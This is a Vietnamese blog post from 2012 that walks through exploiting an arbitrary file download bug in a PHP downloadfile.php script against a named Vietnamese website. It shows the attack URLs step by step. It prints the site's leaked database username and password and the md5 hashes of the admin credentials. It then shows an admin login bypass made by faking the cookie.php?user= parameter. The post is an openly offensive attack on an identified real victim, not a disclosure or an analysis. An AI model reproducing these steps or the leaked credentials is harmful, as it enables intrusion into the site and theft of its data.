New Post

Tuesday, September 25, 2012

Hôm nay xin giới thiệu 1 bug php.
Bug : www.abc.com/downloadfile.php?file=abc/def.zip

Khai thác : www.abc.com/downloadfile.php?file=index.php
Ngoài file index.php bạn có thể download nhiều file nữa , từ đó bạn có thể nghiên cứu mà tấn công.

Victim www.nhanhoanghia.com.vn


Code:
http://www.nhanhoanghia.com.vn/downloadfile.php?file=index.php
Sau khi download file index.php ta mở ra : tìm được như sau :
PHP Code:
include "include/sql.php";
    include 
"include/init.php";
    include 
"mynewsfunction.php";
    include 
"myhtmlfunction.php";
    include 
"myprofunction.php"
Sau đó tiếp tục down file init.php về :
Code:
$server="localhost";
$username="nhanhoan_admin";
$password="ijnuhbygv";
$dbase="nhanhoan_db";
Tìm được user và pass của database.
Choài database là nhanhoan_db => file : nhanhoan_db.sql
Test thử :
Code:
http://www.nhanhoanghia.com.vn/downloadfile.php?file=nhanhoan_db.sql
Bùn 1 s.
Tìm cách khác vậy,
download các file mà index.php include về.
Tìm được trong file mynewsfunction.php dòng :
Code:
//include "webadmin/init_fr.php";
Ha nó chú thích lại loài ra được cái trang admin.
=> http://www.nhanhoanghia.com.vn/webadmin/

Tiếp down trang login về :
Code:
http://www.nhanhoanghia.com.vn/downloadfile.php?file=webadmin/login.php
login.php
Code:
....
<form name="form1" method="post" action="check.php?action=login">...
tiếp tục down trang check.php về :
Code:
<?
@session_start();
include("passinfo.php");
if($action == "login")
{
if(md5($username)!=$u)
{
echo "<script>
location.href='login.php';
</script>
";
exit();
}
if(md5($password)!=$p)
{
echo "<script>
location.href='login.php';
</script>
";
exit();
}
echo "<script>
location.href='cookie.php?user=$p';
</script>
";
exit();
}
if($action == "logout")
{
session_unregister("bdvn_user");
echo "<script>window.top.location.href = 'login.php';</script>";
}

if(!$bdvn_user)
{
echo "<script>window.top.location.href = 'login.php';</script>";
exit();
}

?>
kekeke passinfo.php : nó đó
Down nó zìa lun
Code:
<? $u = "62b8f89cf8e72905e8d3d5cd4e143bef";  $p = "6487171dedb7dd65df63f63365a7c6f1"; ?>
Chít cha md5 dịch ko ra. Hic bùn wa'

Để ý lại 1 chút : trong file check.php có 1 đoạn
location.href='cookie.php?user=$p';
àh ha vậy là hiểu gồi heheh , nếu thích thì tải file cookie.php zìa.

nhưng mà chúng ta có thể fake cookie trực tiếp :
http://nhanhoanghia.com.vn/webadmin/...php?user=admin

0 nhận xét:

Post a Comment